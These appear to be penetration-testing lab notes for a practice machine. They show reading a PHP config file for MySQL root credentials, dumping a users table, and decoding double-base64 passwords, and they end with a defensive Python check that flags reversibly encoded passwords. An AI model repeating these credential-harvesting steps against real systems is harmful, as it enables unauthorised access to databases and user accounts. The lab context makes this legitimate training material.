MySQL


Checking for DB credentials after performing a manual system enumeration

bash-4.2$ ll
total 76K
4.0K drwxr-xr-x. 8 root root 4.0K Jul 15  2020 .
4.0K -rw-r--r--. 1 root root  145 Jul 15  2020 db.php
4.0K -rw-r--r--. 1 root root 2.7K Jun 10  2020 index.php
   0 drwxr-xr-x. 2 root root    6 Jun 10  2020 photos
   0 drwxr-xr-x. 2 root root   44 Jun 10  2020 css
   0 drwxr-xr-x. 3 root root  225 Jun 10  2020 images
   0 drwxr-xr-x. 2 root root  142 Jun 10  2020 js
   0 drwxr-xr-x. 2 root root    6 Jun 10  2020 phpGallery_thumbs
   0 drwxr-xr-x. 2 root root    6 Jun 10  2020 phpGallery_images
   0 drwxr-xr-x. 4 root root   33 Jun  9  2020 ..
8.0K -rw-r--r--. 1 root root 4.5K Jun  8  2020 image.php
4.0K -rw-r--r--. 1 root root 4.0K Jun  8  2020 README.txt
4.0K -rw-r--r--. 1 root root 1.7K Jun  8  2020 UpgradeInstructions.txt
8.0K -rw-r--r--. 1 root root 6.3K Jun  8  2020 embeddedGallery.php
4.0K -rw-r--r--. 1 root root 2.1K Jun  8  2020 functions.php
 20K -rw-r--r--. 1 root root  19K Jun  8  2020 license.txt
4.0K -rw-r--r--. 1 root root 1.6K Jun  8  2020 phpGalleryConfig.php
4.0K -rw-r--r--. 1 root root  619 Jun  8  2020 phpGalleryStyle-RED.css
4.0K -rw-r--r--. 1 root root  509 Jun  8  2020 phpGalleryStyle.css
4.0K -rw-r--r--. 1 root root 2.6K Jun  8  2020 thumbnail_generator.php

db.php

bash-4.2$ cat db.php
<?php
define('DBHOST', '127.0.0.1');
define('DBUSER', 'root');
define('DBPASS', 'MalapropDoffUtilize1337');
define('DBNAME', 'SimplePHPGal');
?>

DB credential identified; root:MalapropDoffUtilize1337

root session


bash-4.2$ mysql -h 127.0.0.1 -uroot -pMalapropDoffUtilize1337
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 102
Server version: 8.0.20 MySQL Community Server - GPL
 
Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.
 
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
mysql> Bye
bash-4.2$ 

The interactive client connected, printed Bye, and exited immediately. Switching to one-off queries with the -e flag

bash-4.2$ mysql -h 127.0.0.1 -uroot -pMalapropDoffUtilize1337 -e 'SHOW databases;'
mysql: [Warning] Using a password on the command line interface can be insecure.
+--------------------+
| Database           |
+--------------------+
| SimplePHPGal       |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+

SimplePHPGal DB

bash-4.2$ mysql -h 127.0.0.1 -uroot -pMalapropDoffUtilize1337 -e 'SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema="SimplePHPGal";'
mysql: [Warning] Using a password on the command line interface can be insecure.
+--------------+------------+
| TABLE_SCHEMA | TABLE_NAME |
+--------------+------------+
| SimplePHPGal | users      |
+--------------+------------+
 
bash-4.2$ mysql -h 127.0.0.1 -uroot -pMalapropDoffUtilize1337 -e 'SELECT * FROM SimplePHPGal.users;'
mysql: [Warning] Using a password on the command line interface can be insecure.
+----------+----------------------------------------------+
| username | password                                     |
+----------+----------------------------------------------+
| josh     | VFc5aWFXeHBlbVZJYVhOelUyVmxaSFJwYldVM05EYz0= |
| michael  | U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==     |
| serena   | VDNabGNtRnNiRU55WlhOMFRHVmhiakF3TUE9PQ==     |
+----------+----------------------------------------------+

The users table holds credential strings. They don’t look like password hashes; they look more like base64-encoded strings

Base64 Decoding


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/snookums]
└─$ echo VFc5aWFXeHBlbVZJYVhOelUyVmxaSFJwYldVM05EYz0= | base64 -d | base64 -d
MobilizeHissSeedtime747

Password decoded for the josh user; MobilizeHissSeedtime747

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/snookums]
└─$ echo U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ== | base64 -d | base64 -d     
HockSydneyCertify123

Password decoded for the michael user; HockSydneyCertify123
michael is a valid system user. The credential will be validated

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/snookums]
└─$ echo VDNabGNtRnNiRU55WlhOMFRHVmhiakF3TUE9PQ== | base64 -d | base64 -d
OverallCrestLean000

Password decoded for the serena user; OverallCrestLean000
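
Base64 is an encoding, not a hash, so the users table above stores recoverable passwords. The following is an added example (not part of the original notes) of an audit check that labels stored password values as hashed or merely base64-wrapped, generalised from the two layers seen here to any number of nested layers; the function names, the labels and the bcrypt-style row are assumptions made for illustration.

```python
import base64
import binascii
import re

B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")
HEX_RE = re.compile(r"[0-9a-fA-F]{32,128}")
# Modular-crypt prefixes of common password hashes (bcrypt, argon2, sha-crypt).
HASH_PREFIXES = ("$2a$", "$2b$", "$2y$", "$argon2", "$5$", "$6$")

def peel_base64(value, max_layers=5):
    """Strip nested base64 layers; return (layers_removed, remaining_text)."""
    layers = 0
    while layers < max_layers:
        if len(value) % 4 or not B64_RE.fullmatch(value):
            break
        try:
            decoded = base64.b64decode(value, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            break
        if not decoded or not decoded.isprintable():
            break
        value, layers = decoded, layers + 1
    return layers, value

def classify(stored):
    """Label one stored password value as hashed, reversible, or unknown."""
    if stored.startswith(HASH_PREFIXES):
        return "hash"
    if HEX_RE.fullmatch(stored):
        return "hex-digest"
    layers, _ = peel_base64(stored)
    return f"reversible-base64x{layers}" if layers else "unknown"

def audit(rows):
    """Return usernames whose stored value is only encoded, not hashed."""
    return [user for user, stored in rows if classify(stored).startswith("reversible")]

# Values from the SimplePHPGal.users output above, plus one constructed bcrypt-style row.
ROWS = [
    ("josh", "VFc5aWFXeHBlbVZJYVhOelUyVmxaSFJwYldVM05EYz0="),
    ("michael", "U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ=="),
    ("serena", "VDNabGNtRnNiRU55WlhOMFRHVmhiakF3TUE9PQ=="),
    ("constructed", "$2y$10$" + "A" * 53),
]

if __name__ == "__main__":
    for user, stored in ROWS:
        print(user, classify(stored))
```

Every row flagged by audit() is a password that anyone with read access to the table can recover; the remedy is a salted password hash such as bcrypt or argon2 rather than another encoding layer.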